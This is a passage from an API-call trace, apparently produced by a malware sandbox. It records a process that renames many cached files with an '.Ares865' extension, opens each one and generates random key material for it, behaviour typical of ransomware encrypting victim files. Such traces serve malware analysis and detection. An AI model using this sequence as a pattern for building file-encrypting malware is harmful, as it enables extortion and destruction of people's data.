HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1.Ares865") returned 155 [0110.289] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1.ares865"), dwFlags=0x1) returned 1 [0110.290] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\40e450f7ce13419a2ccc2a5445035a0a_06f02b1f13ab4b11b8fc669bde565af1.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.290] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2920) returned 1 [0110.290] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.291] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.291] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.291] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.291] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.291] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.294] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.295] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.295] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.295] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398.Ares865") returned 155 [0110.295] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398.ares865"), dwFlags=0x1) returned 1 [0110.297] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4c8f841fb02dec8c10108028db86a08d_8dafffd2d43bdc7a1717f5b61c303398.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.297] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=471) returned 1 [0110.297] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.297] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.297] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.297] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.298] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.298] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.301] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.302] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.302] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.302] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9.Ares865") returned 155 [0110.302] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9.ares865"), dwFlags=0x1) returned 1 [0110.304] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\4dd39726d4b55ac3b4119b35a893323c_46cccfb940a93f39a734f69efcdd76e9.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.304] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1664) returned 1 [0110.304] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.304] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.304] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.304] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.305] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.305] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.308] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.308] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.308] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.309] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77.Ares865") returned 155 [0110.309] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77.ares865"), dwFlags=0x1) returned 1 [0110.311] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.311] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=727) returned 1 [0110.311] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.311] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.311] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.311] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.312] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.312] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.314] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.315] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.315] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.316] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220.Ares865") returned 155 [0110.316] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220.ares865"), dwFlags=0x1) returned 1 [0110.317] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_6cba2c06d5985dd95ae59af8fc7c6220.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.317] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=727) returned 1 [0110.317] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.317] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.317] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.318] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.318] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.318] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.321] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.321] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.321] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.322] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4.Ares865") returned 155 [0110.322] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4.ares865"), dwFlags=0x1) returned 1 [0110.323] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5457a8ce4b2a7499f8299a013b6e1c7c_ce50f893881d43dc0c815e4d80faf2b4.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.323] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=471) returned 1 [0110.323] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.324] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.324] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.324] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.324] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.324] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.327] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.328] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.328] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.328] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD.Ares865") returned 122 [0110.328] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\696f3de637e6de85b458996d49d759ad"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\696f3de637e6de85b458996d49d759ad.ares865"), dwFlags=0x1) returned 1 [0110.330] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\696F3DE637E6DE85B458996D49D759AD.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\696f3de637e6de85b458996d49d759ad.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.330] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=813) returned 1 [0110.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.330] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.330] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.331] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.331] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.331] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.332] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.332] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.333] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21.Ares865") returned 155 [0110.333] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21.ares865"), dwFlags=0x1) returned 1 [0110.335] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\705a76de71ea2caebb8f0907449ce086_9752c5b2d53ee7a19f7764b52968ec21.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.335] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1608) returned 1 [0110.335] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.335] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.335] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.335] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.336] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.336] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.338] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.339] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.339] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.340] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21.Ares865") returned 122 [0110.340] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7396c420a8e1bc1da97f1af0d10bad21"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7396c420a8e1bc1da97f1af0d10bad21.ares865"), dwFlags=0x1) returned 1 [0110.342] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7396C420A8E1BC1DA97F1AF0D10BAD21.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7396c420a8e1bc1da97f1af0d10bad21.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0110.342] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=554) returned 1 [0110.342] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0110.342] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0110.342] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0110.342] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0110.343] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0110.343] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.345] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0110.346] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0110.346] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0110.346] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6.Ares865") returned 155 [0110.346] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7423f88c7f265f0defc08ea88c3bde45_d975bba8033175c8d112023d8a7a8ad6"), lpNewFileName="C:\\Users\\5p5NrGJn0jS 